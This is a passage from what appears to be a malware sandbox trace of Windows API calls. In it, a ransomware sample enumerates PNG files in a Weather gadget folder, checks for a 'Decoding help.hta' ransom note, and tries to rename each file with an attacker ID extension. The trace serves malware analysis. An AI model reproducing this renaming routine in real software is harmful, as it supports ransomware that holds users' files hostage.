lpString2="28.png") returned 1 [0059.453] lstrlenW (lpString="28.png") returned 6 [0059.453] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.453] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.453] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="28.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png" [0059.453] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png" [0059.453] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.453] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\28.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\28.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\28.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.454] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc1fc485, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc1fc485, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1010, dwReserved0=0x0, dwReserved1=0x0, cFileName="29.png", cAlternateFileName="")) returned 1 [0059.454] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.454] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.454] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.454] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.454] lstrcmpiW (lpString1="Decoding help.hta", lpString2="29.png") returned 1 [0059.454] lstrlenW (lpString="29.png") returned 6 [0059.454] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.454] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.454] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="29.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png" [0059.454] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png" [0059.454] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.454] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\29.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\29.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.455] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc1fc485, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc1fc485, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd75823c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.png", cAlternateFileName="")) returned 1 [0059.455] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.455] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.455] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.455] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.455] lstrcmpiW (lpString1="Decoding help.hta", lpString2="3.png") returned 1 [0059.455] lstrlenW (lpString="3.png") returned 5 [0059.455] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.455] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.455] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="3.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png" [0059.455] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png" [0059.455] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.455] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\3.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\3.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.455] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc2225e4, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc2225e4, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd75823c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1010, dwReserved0=0x0, dwReserved1=0x0, cFileName="30.png", cAlternateFileName="")) returned 1 [0059.456] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.456] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.456] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.456] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.456] lstrcmpiW (lpString1="Decoding help.hta", lpString2="30.png") returned 1 [0059.456] lstrlenW (lpString="30.png") returned 6 [0059.456] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.456] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.456] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="30.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png" [0059.456] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png" [0059.456] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\30.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\30.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.457] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc2225e4, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc2225e4, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd75823c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x16df, dwReserved0=0x0, dwReserved1=0x0, cFileName="31.png", cAlternateFileName="")) returned 1 [0059.457] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.457] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.457] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.457] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.457] lstrcmpiW (lpString1="Decoding help.hta", lpString2="31.png") returned 1 [0059.457] lstrlenW (lpString="31.png") returned 6 [0059.457] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.457] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.457] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="31.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png" [0059.457] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png" [0059.457] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\31.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\31.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.458] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc248743, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc248743, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd75823c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x16df, dwReserved0=0x0, dwReserved1=0x0, cFileName="32.png", cAlternateFileName="")) returned 1 [0059.458] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.458] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.458] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.458] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.458] lstrcmpiW (lpString1="Decoding help.hta", lpString2="32.png") returned 1 [0059.458] lstrlenW (lpString="32.png") returned 6 [0059.458] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.458] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.458] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="32.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png" [0059.458] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png" [0059.458] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.458] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\32.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\32.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.459] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc248743, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc248743, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd75823c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1010, dwReserved0=0x0, dwReserved1=0x0, cFileName="33.png", cAlternateFileName="")) returned 1 [0059.459] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.459] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.459] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.459] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.459] lstrcmpiW (lpString1="Decoding help.hta", lpString2="33.png") returned 1 [0059.459] lstrlenW (lpString="33.png") returned 6 [0059.459] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.459] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.459] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="33.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png" [0059.459] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png" [0059.459] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.459] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\33.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\33.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.459] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: 